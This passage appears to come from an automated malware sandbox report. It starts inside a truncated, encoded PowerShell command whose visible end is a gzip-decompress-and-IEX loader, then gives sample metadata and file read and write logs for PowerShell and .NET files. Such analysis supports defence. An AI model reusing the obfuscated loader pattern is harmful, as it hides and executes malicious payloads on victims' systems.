QBSAGoATwBOADAAUwBFADYAZwB5AFQAegBBAHMAbgB6ADUANABzAHAAQQBSADAARwBZAGUAbQBsAE0AcwA5AEIAMQBrAHkARgB4AGkARABDAGIAbABaAG4AZwArAC8AZQBmAEkAYgB6ADgAQwBZAGgAZABHAHMAegBsAEkAbwA5AEsAdQAzAEsAcABWAEYATAAvAHIAMABwAEcANwB0AGQAaABxAGIATgAxAHIAQgAvAE4ANQBkAFcAUQBQAFAASABrADkAQwBZAC8AdQBjAGsANABvAE0ALwBEAFkARQBYAC8AeAB3AFQAOABjAE8AbQAvAFEANgB2AEEAUwArAGIAcwBFAGIAcgBFAG8AWgBmAHgATQBuAEwAYQBoADEAegBPAGMAdABIAEoAdgB2AEQAMgA4AEkAcQBrAEcAMwBTAFQAYwBFADkASQB6AEcAVgBoAHkAVwBiAHcANQBFAHgANgBxAEgANgBPAEQAVwBRADEAUgArAGcAYwBvADIAKwBvAEEATwBGAFYAUgBmAGsAUwAzAHAAMQA4AEgAcQBxAEcAaQB0AEoAbgA5AEYAZQAwAHgAVgA2AHEAKwBCAFgAZABVADAATABoAEcAVgBUAG8AcwBCAG0AdwBsAE0ASgBjAFYASwBZAFQASQAwAG8AWQA5AHYANABDAFAAYQAvAEEAaQBaAGMATABBAEEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA
Imagebase: 0xb00000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: high

File Activities

File Created

File Path: C:\Windows\system32\catroot
Access: read data or list directory | synchronize
Attributes: device
Options: directory file | synchronous io non alert | open for backup ident | open reparse point
Completion: object name collision
Count: 1
Address: 6D265B28
Symbol: unknown

File Path: C:\Windows\system32\catroot2
Access: read data or list directory | synchronize
Attributes: device
Options: directory file | synchronous io non alert | open for backup ident | open reparse point
Completion: object name collision
Count: 1
Address: 6D265B28
Symbol: unknown

File Path: C:\Users\user
Access: read data or list directory | synchronize
Attributes: device
Options: directory file | synchronous io non alert | open for backup ident | open reparse point
Completion: object name collision
Count: 1
Address: 6E4BCF06
Symbol: unknown

File Path: C:\Users\user\AppData\Roaming
Access: read data or list directory | synchronize
Attributes: device
Options: directory file | synchronous io non alert | open for backup ident | open reparse point
Completion: object name collision
Count: 1
Address: 6E4BCF06
Symbol: unknown

File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Access: read attributes | synchronize | generic write
Attributes: device
Options: synchronous io non alert | non directory file
Completion: success or wait
Count: 1
Address: 6E681926
Symbol: CreateFileW

Source Old File Path New File Path Completion Count Address Symbol

File Written

File Path | Offset | Length | Value | Ascii | Completion | Count | Address | Symbol
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | unknown | 64 | 40 00 00 01 65 00 00 00 00 00 00 00 0b 00 00 00 04 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | @...e............ | success or wait | 1 | 6E7876FC | WriteFile
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | unknown | 40 | 48 00 00 02 03 00 00 00 00 00 00 00 01 00 00 00 3c 40 b0 5e e7 8d bf 4c b2 22 4d 79 98 9c a7 3a 03 00 00 00 0e 00 20 00 | H...... <@.^...L."My...:...... | success or wait | 11 | 6E7876FC | WriteFile
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | unknown | 32 | 4d 69 63 72 6f 73 6f 66 74 2e 50 6f 77 65 72 53 68 65 6c 6c 2e 43 6f 6e 73 6f 6c 65 48 6f 73 74 | Microsoft.PowerShell.ConsoleHost | success or wait | 11 | 6E7876FC | WriteFile
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | unknown | 1 | 00 | . | success or wait | 7 | 6E7876FC | WriteFile
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | unknown | 4 | 40 00 00 03 | @... | success or wait | 1 | 6E7876FC | WriteFile
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | unknown | 60 | 00 0e 80 00 01 0e 80 00 02 0e 80 00 03 0e 80 00 04 0e 80 00 05 0e 80 00 06 0e 80 00 07 0e 80 00 08 0e 80 00 09 0c 80 00 0a 0e 80 00 54 01 40 00 47 01 40 00 da 00 40 00 0e 40 40 01 | ............ [email protected].@...@..@@. | success or wait | 1 | 6E7876FC | WriteFile

File Read

File Path | Offset | Length | Completion | Count | Address | Symbol
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6E495705 | unknown
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4095 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 6135 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4097 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4098 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 7976 | success or wait | 1 | 6E495705 | unknown
C:\Windows\\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll.aux | unknown | 176 | success or wait | 1 | 6E3F03DE | ReadFile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6E49CA54 | ReadFile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6E49CA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4095 | success or wait | 1 | 6E49CA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 6135 | success or wait | 1 | 6E49CA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4097 | success or wait | 1 | 6E49CA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4098 | success or wait | 1 | 6E49CA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 7976 | success or wait | 1 | 6E49CA54 | ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll.aux | unknown | 900 | success or wait | 1 | 6E3F03DE | ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll.aux | unknown | 620 | success or wait | 1 | 6E3F03DE | ReadFile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6E495705 | unknown
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6E495705 | unknown
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6E495705 | unknown
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6E495705 | unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll.aux | unknown | 748 | success or wait | 1 | 6E3F03DE | ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\ccc7c82770f93d1392abde4be3a80378\Microsoft.Management.Infrastructure.ni.dll.aux | unknown | 748 | success or wait | 1 | 6E3F03DE | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4095 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 6135 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4097 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4098 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 7976 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4121 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4253 | success or wait | 1 | 6E495705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 8171 | end of file | 1 | 6E495705 | unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll.aux | unknown | 864 | success or wait | 1 | 6E3F03DE | ReadFile

Disassembly
